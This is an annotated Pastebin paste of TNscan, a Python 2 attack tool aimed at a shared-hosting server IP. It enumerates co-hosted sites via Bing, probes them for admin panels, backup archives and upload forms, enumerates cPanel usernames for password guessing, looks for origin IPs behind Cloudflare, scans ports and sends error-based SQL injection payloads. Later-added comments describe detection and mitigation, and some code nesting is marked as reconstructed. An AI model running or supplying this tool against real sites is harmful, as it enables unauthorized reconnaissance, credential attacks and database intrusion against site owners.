dravatar

Untitled

May 5th, 2016
  1. #!/usr/bin/env python2
  2. # >>> Bism Allah <<<
  3. # Code Name : TNscan v1.0
  4. # Coder : MatriX Coder (17 yo guy from Tunisia)
  5. # Blog : www.matrixcoder.co.vu
  6. # Twitter : MatriX_Coder
  7. # Pastebin : www.pastebin.com/u/matrixcoder
  8. # this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
  9. # Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
  10. # greats also to tunisia fallega team and to madleets team and to you !
  11. # Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
  12.  
  13. import re, urllib2, urllib, os, socket, sys
  14. from platform import system
# ASCII-art banner; printed at start-up and again after every menu round.
logo = """
\t _____ _ _
\t|_ _| \ | |
\t | | | \| |___ ___ __ _ _ __
\t | | | . ` / __|/ __/ _` | '_ \
\t | | | |\ \__ \ (_| (_| | | | |
\t \_/ \_| \_/___/\___\__,_|_| |_| v1.0

"""

# Menu text; the input loop in TNscan.__init__ maps each number to a method.
# Options 1-3 only query Bing. The other scan options send HTTP requests,
# DNS lookups or TCP connects towards the enumerated sites or the server IP,
# so those are the ones that can show up in the target's own logs.
menu = """
1) Get all websites
2) Get joomla websites
3) Get wordpress websites
4) Find control panel
5) Find zip files
6) Find upload files
7) Get server users
8) Scan from SQL injection
9) Crawl and scan from SQL injection
10) Scan ports (range of ports)
11) Scan ports (common ports )
12) Get server banner
13) Bypass Cloudflare
14) About !
99) Exit
"""
def unique(seq):
    """
    Return the items of seq with duplicates dropped, keeping the first
    occurrence of each item in its original position.
    """
    already = set()
    ordered = []
    for item in seq:
        if item in already:
            continue
        already.add(item)
        ordered.append(item)
    return ordered
  48.  
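def clearScr() :
    """
    Clear the terminal.

    Runs ``cls`` on Windows and ``clear`` on every other platform. The
    earlier version only handled 'Linux' and 'Windows', so on anything
    else (macOS, the BSDs) the screen was silently left untouched.
    """
    # Both commands are fixed strings; no user input reaches the shell.
    os.system('cls' if system() == 'Windows' else 'clear')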
  58.  
  59. class TNscan :
    def __init__(self, serverip) :
        """
        Remember the target IP, enumerate its co-hosted sites, then run
        the interactive menu until the operator quits.

        The reverse-IP lookup (getSites) already runs here, before the
        menu is shown. The loop only ends through exit() or an uncaught
        exception, so the constructor does not return normally.
        """
        self.serverip = serverip
        self.getSites(False)
        print menu

        # Menu entries that need no extra input from the operator.
        no_arg_actions = {
            '1': lambda: self.getSites(True),
            '2': self.getJoomla,
            '3': self.getWordpress,
            '4': self.findPanels,
            '5': self.findZip,
            '6': self.findUp,
            '7': self.getUsers,
            '8': self.grabSqli,
            '11': lambda: self.portScanner(2, None),
            '12': self.getServerBanner,
            '13': self.cloudflareBypasser,
            '14': self.aboutME,
        }

        while True :
            choice = raw_input(' Enter choice -> ')
            handler = no_arg_actions.get(choice)
            if handler is not None :
                handler()
            elif choice == '9' :
                # int() is unguarded: non-numeric input raises ValueError.
                nbpages = int(raw_input(' Enter number of pages to crawl (ex : 100) -> '))
                self.crawlSqli(nbpages)
            elif choice == '10' :
                ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
                self.portScanner(1, ran)
            elif choice == '99' :
                print ' Goodbye'
                exit()
            # Unknown choices fall through to the prompt below unchanged.
            con = raw_input(' Continue [Y/n] -> ')
            # con[0] raises IndexError when the answer is empty.
            if con[0].upper() == 'N' :
                exit()
            clearScr()
            print logo
            print menu
  106.  
    def aboutME(self) :
        """Clear the screen and print the author's credits text."""
        clearScr()
        credits = """
>>> Bism Allah <<<
Code Name : TNscan v1.0
Coder : MatriX Coder (17 yo guy from Tunisia)
Blog : www.matrixcoder.co.vu
Twitter : MatriX_Coder
Pastebin : www.pastebin.com/u/matrixcoder
this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
greats also to tunisian fallega team, to madleets team and to you !
Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
"""
        print credits
  121.  
    def getSites(self, a) :
        """
        Collect the sites Bing lists for self.serverip (reverse-IP lookup).

        Queries Bing's ``ip:`` operator at result offsets 1, 51 and 101,
        pulls the result links out of the HTML with a regex, reduces every
        http:// link to its host and stores the de-duplicated list in
        self.sites. When ``a`` is true the list is printed as well.

        Defender note: every request made here goes to bing.com, so this
        step leaves nothing in the target's logs. Whatever a search engine
        has indexed for a shared IP should be treated as already known;
        co-hosted sites cannot rely on being hard to find.
        """
        lista = []
        page = 1
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                # Depends on Bing's result markup: links sit in <h2><a href="...">.
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    allnoclean = findwebs[i]
                    # Only http:// links match; https:// results are dropped here.
                    findall1 = re.findall('http://(.*?)/', allnoclean)
                    for idx, item in enumerate(findall1):
                        # Normalise to http://www.<host>/ unless 'www' already
                        # appears anywhere in the host string.
                        if 'www' not in item:
                            findall1[idx] = 'http://www.' + item + '/'
                        else:
                            findall1[idx] = 'http://' + item + '/'
                    lista.extend(findall1)

                # NOTE(review): nesting reconstructed from a paste that lost its
                # indentation. With page advanced inside the try, a URLError
                # leaves page unchanged and the same request is retried.
                page += 50
            except urllib2.URLError:
                pass
        self.sites = unique(lista)
        if a :
            clearScr()
            # The count printed is len(lista), i.e. before de-duplication.
            print '[*] Found ', len(lista), ' Website\n'
            for site in self.sites :
                print site
  154.  
    def getWordpress(self) :
        """
        List sites on self.serverip that Bing has indexed with a
        ``?page_id=`` URL, which the author treats as a WordPress marker.

        The author's note says the resulting list is meant as input for
        password-list attacks or a wpscan-style vulnerability scan.

        Defender note: the lookup itself only talks to bing.com. The
        follow-up activity the author describes is what rate limiting and
        lockout on the login endpoint, and keeping core, plugins and
        themes patched, are meant to blunt.
        """
        lista = []
        page = 1
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+?page_id=&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    wpnoclean = findwebs[i]
                    # Keep the part of the link in front of "?page_id=".
                    findwp = re.findall('(.*?)\?page_id=', wpnoclean)
                    lista.extend(findwp)
                # NOTE(review): nesting reconstructed; page is advanced inside
                # the try, so a failed request is retried without advancing.
                page += 50
            except:
                # Bare except: every error is swallowed silently.
                pass
        lista = unique(lista)
        clearScr()
        print '[*] Found ', len(lista), ' Wordpress Website\n'
        for site in lista :
            print site
  182.  
    def getJoomla(self) :
        """
        List sites on self.serverip that Bing has indexed with an
        ``index.php?option=com`` URL, which the author treats as a Joomla
        marker. The author's note says the sites are then candidates for
        brute forcing or scanning.

        Unlike the sibling lookups there is no try/except here, so a
        network error from urlopen propagates to the caller.

        Defender note: the lookup only talks to bing.com; nothing reaches
        the listed sites at this stage.
        """
        lista = []
        page = 1
        while page <= 101:
            bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+index.php?option=com&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('<h2><a href="(.*?)"', readbing)
            for i in range(len(findwebs)):
                jmnoclean = findwebs[i]
                # Keep the part of the link in front of "index.php".
                findjm = re.findall('(.*?)index.php', jmnoclean)
                lista.extend(findjm)
            page += 50
        lista = unique(lista)
        clearScr()
        print '[*] Found ', len(lista), ' Joomla Website\n'
        for site in lista :
            print site


  206.  
  207.  
    def findPanels(self) :
        """
        Request a fixed list of admin/login paths on every site in
        self.sites and print each one that answers with HTTP 200.

        Defender note: from the server side this is one client requesting
        dozens of admin-style paths in quick succession, most of them
        ending in 404. No User-Agent is set, so the requests carry the
        library default (Python-urllib/...). Both traits are easy to alert
        on or rate-limit. Note that a site returning 200 for unknown paths
        makes every entry look like a hit.
        """
        print "[~] Finding admin panels"
        adminList = [
            'admin/', 'site/admin', 'admin.php/', 'up/admin/',
            'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/',
            'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/',
            'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/',
            'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/',
            'administrator/', 'administrator.php/', 'joomla/administrator/',
            'jm/administrator/', 'site/administrator/', 'install/',
            'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/',
            'login.php', 'site/login', 'site/login.php', 'up/login/',
            'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm',
            'member', 'control', 'webmaster', 'myadmin', 'admin_cp',
            'admin_site',
        ]
        clearScr()
        for site in self.sites :
            for admin in adminList :
                candidate = site + admin
                try :
                    if urllib.urlopen(candidate).getcode() != 200 :
                        continue
                    print " [*] Found admin panel -> ", candidate
                except IOError :
                    # Unreachable host or failed request: move to the next path.
                    pass
  224.  
    def findZip(self) :
        """
        Request a fixed list of backup/archive file names on every site in
        self.sites and print each one that answers with HTTP 200.

        Defender note: the names are guesses at backups left in the web
        root (site archives, SQL dumps). Keeping backups outside the
        document root, or denying archive and .sql downloads at the web
        server, removes the exposure. Repeated requests for such names
        from one client are a clear log indicator.
        """
        zipList = [
            'backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip',
            'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar',
            'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar',
            'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip',
            'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql',
            'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip',
            'wordpress.rar',
        ]
        clearScr()
        print "[~] Finding zip file"
        for site in self.sites :
            for zip1 in zipList :
                target = site + zip1
                try:
                    if urllib.urlopen(target).getcode() != 200 :
                        continue
                    print " [*] Found zip file -> ", target
                except IOError :
                    # Unreachable host or failed request: try the next name.
                    pass
  240.  
    def findUp(self) :
        """
        Look for pages with a file-upload form on every site in self.sites.

        Each name in upList is requested; when the answer is HTTP 200 the
        page is fetched a second time and every line containing the text
        ``type=file`` is reported. The author's note says such forms may
        let an attacker upload malicious files such as webshells.

        Defender note: upload handlers should require authentication,
        validate content type and extension on the server, and store files
        where they cannot be executed. Probing for these script names from
        one client is visible in access logs.
        """
        upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
        clearScr()
        print "[~] Finding Upload"
        for site in self.sites :
            for up in upList :
                try :
                    if (urllib.urlopen(site + up).getcode() == 200) :
                        # Second request for the same URL, this time for the body.
                        html = urllib.urlopen(site + up).readlines()
                        for line in html :
                            # Plain substring-style match; it only hits the
                            # unquoted form type=file, and prints once per
                            # matching line.
                            if re.findall('type=file', line) :
                                print " [*] Found upload -> ", site+up
                except IOError :
                    pass
  260.  
    def getUsers(self) :
        """
        Guess hosting account names from the domain names in self.sites.

        For each site the scheme, dots, dashes and slashes are stripped
        from the URL, and the remaining string is sent as the ``user``
        parameter to /cgi-sys/guestbook.cgi on that site. While the
        response contains "invalid username" the candidate is shortened by
        one character and retried, down to three characters. The first
        candidate that does not produce that message is recorded.

        The author's note says the names are meant as input for password
        guessing against cPanel, SSH, FTP or remotely reachable MySQL.

        Defender note: the technique relies on the script answering
        differently for existing and non-existing accounts. A series of
        guestbook.cgi requests whose ``user`` value loses one character
        each time is a distinctive log pattern. Lockout or rate limiting
        on the login services, key-based SSH and not exposing MySQL
        remotely limit what a leaked account name is worth.
        """
        clearScr()
        print "[~] Grabbing Users"
        userslist = []
        for site1 in self.sites :
            try:
                site = site1
                site = site.replace('http://www.', '')
                site = site.replace('http://', '')
                site = site.replace('.', '')
                if '-' in site:
                    site = site.replace('-', '')
                site = site.replace('/', '')
                while len(site) > 2:
                    resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
                    if 'invalid username' not in resp.lower():
                        print '\t [*] Found -> ', site
                        userslist.append(site)
                        break
                    else :
                        # Echo the rejected candidate before shortening it.
                        print site

                    site = site[:-1]
            except:
                # Bare except: any error ends the attempts for this site silently.
                pass

        clearScr()
        for user in userslist :
            print user


  297.  
  298.  
    def cloudflareBypasser(self) :
        """
        Compare the address a site resolves to with the addresses of five
        common subdomains (mail, webmail, ftp, direct, cpanel) and report
        the first subdomain that resolves somewhere else.

        Only DNS lookups are made; nothing is sent to the site itself.

        Defender note: the idea is that service subdomains are often left
        pointing straight at the origin while the main name goes through
        the CDN. Auditing DNS for records that bypass the proxy, and
        letting the origin accept web traffic only from the CDN's address
        ranges, removes what this check looks for.
        """
        clearScr()
        print "[~] Bypassing cloudflare"
        subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
        for site in self.sites :
            # The results of these two replace() calls are discarded, so
            # `site` still holds the full URL from self.sites afterwards.
            site.replace('http://', '')
            site.replace('/', '')
            try:
                ip = socket.gethostbyname(site)
            except socket.error:
                # `ip` stays unset (or keeps the value from an earlier site)
                # when this lookup fails.
                pass
            for sub in subdoms:
                doo = sub + '.' + site
                print ' [~] Trying -> ', doo
                try:
                    ddd = socket.gethostbyname(doo)
                    if ddd != ip:
                        print ' [*] Cloudflare bypassed -> ', ddd
                        break
                except socket.error :
                    pass

  325.  
    def getServerBanner(self) :
        """
        Fetch http://<serverip> and print the value of its Server header.

        Defender note: the header can disclose the web server product and
        version, which narrows down which known issues apply. Trimming it
        (for example ``server_tokens off`` in nginx or ``ServerTokens
        Prod`` in Apache) reduces what a single request reveals.
        """
        clearScr()
        try:
            reply = urllib.urlopen('http://' + self.serverip)
            banner = reply.headers.getheader('server')
            print ' [*] Server header -> ', banner
        except:
            # Bare except: a failed request prints nothing at all.
            pass
  339.  
    def grabSqli(self) :
        """
        Collect URLs on self.serverip that Bing has indexed with a
        ``php?id=`` query string and hand them to checkSqli.

        The collection step only talks to bing.com; the requests towards
        the listed sites happen in checkSqli.
        """
        page = 1
        lista = []
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    x = findwebs[i]
                    lista.append(x)
            except:
                # Bare except: a failed page is skipped silently.
                pass
            # Advanced outside the try, so a failed page is not retried.
            page += 50
        lista = unique(lista)
        self.checkSqli(lista)

  361.  
    def checkSqli(self, s):
        """
        Test each URL in ``s`` for error-based SQL injection.

        For every query-string parameter of a URL, each string in
        ``payloads`` is appended to the parameter, the modified URL is
        fetched, and every response line is matched against a regex of
        database error messages. A match prints the modified URL.
        The author credits the webpwn3r project for most of this code.

        Defender note: the check only works when database error text
        reaches the response body. Parameterised queries remove the flaw;
        suppressing verbose database errors removes the signal this check
        keys on. The requests set no User-Agent (library default,
        Python-urllib/...) and end a parameter value in quote or
        backslash sequences, which WAF and IDS rules commonly match.
        """
        clearScr()
        print "[~] Checking SQL injection"
        payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
        # Case-insensitive patterns for error text from several database engines.
        check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
        for url in s:
            try:
                # A URL without '?' raises IndexError here and is skipped
                # by the bare except below.
                for param in url.split('?')[1].split('&'):
                    for payload in payloads:
                        # str.replace changes every occurrence of the
                        # "name=value" text in the URL, not just one.
                        power = url.replace(param, param + payload.strip())
                        #print power
                        html = urllib2.urlopen(power).readlines()
                        for line in html:
                            checker = re.findall(check, line)
                            if len(checker) != 0 :
                                # Printed once per matching line.
                                print ' [*] SQLi found -> ', power
            except:
                # Bare except: any error drops the rest of this URL's tests.
                pass

  387.  
    def crawlSqli(self, nbpages) :
        """
        Crawl each site in self.sites with the chilkat spider and pass the
        crawled URLs to checkSqli.

        ``nbpages`` is the number of CrawlNext() attempts made per site.
        chilkat is a third-party package imported here, so a missing
        install only fails when this menu option is chosen.

        Defender note: unlike the search-engine lookups, the crawl itself
        requests pages from the site, so it appears in access logs before
        any test request is made.
        """
        import chilkat
        spider = chilkat.CkSpider()
        for url in self.sites :
            spidred = []
            print " [~] Crawling -> ", url
            spider.Initialize(url)
            #spider.unspideredUrl(url)
            i = 0
            for i in range(nbpages) :
                if spider.CrawlNext() :
                    spidred.append(spider.lastUrl())
            # NOTE(review): nesting reconstructed from a paste that lost its
            # indentation; the summary and scan are assumed to run once per site.
            print " [+] Crawled -> ", spidred
            print " [~] Scanning -> ", url, " from SQL injection"
            self.checkSqli(spidred)

  408.  
    def portScanner(self, mode, ran) :
        """
        Report which TCP ports on self.serverip accept a connection.

        mode 1: ``ran`` is a "start-end" string; ports start .. end-1 are
                tried, because range() excludes the end value.
        mode 2: a fixed list of nine common service ports is tried and
                ``ran`` is not used.
        Any other mode does nothing after the banner line.

        Defender note: every probe is a full TCP connect, made one after
        another from a single source address. In firewall or connection
        logs that is a run of connection attempts to consecutive ports,
        which threshold-based scan detection picks up readily.
        """
        clearScr()
        print "[~] Scanning Ports"
        def do_it(ip, port):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Timeout is commented out, so the connect blocks for the
            # system default on filtered ports.
            #sock.settimeout(5)
            # connect_ex returns 0 on success. The name `sock` is rebound to
            # that result, and the socket object is never closed explicitly.
            sock = sock.connect_ex((ip,port))
            if sock == 0:
                print " [*] Port %i is open" % port

        if mode == 1 :
            # Unvalidated input: a string without '-' or with non-digits
            # raises IndexError / ValueError here.
            a = ran.split('-')
            start = int(a[0])
            end = int(a[1])
            for i in range(start, end):
                do_it(self.serverip, i)
        elif mode == 2 :
            for port in [80,21,22,2082,25,53,110,443,143] :
                # didn't use multithreading cos it's few ports
                do_it(self.serverip, port)
  433.  
# Script entry point: the single command-line argument is the server IP.
if __name__ == '__main__' :
    try :
        clearScr()
        print logo
        target = sys.argv[1]
        # The constructor runs the whole interactive session.
        TNscan(target)
    except IndexError :
        # Reached when no argument was given. Any IndexError raised while
        # TNscan is running ends up here too and prints the same usage line.
        print " [*] Usage : python " + sys.argv[0] + " 127.0.0.1"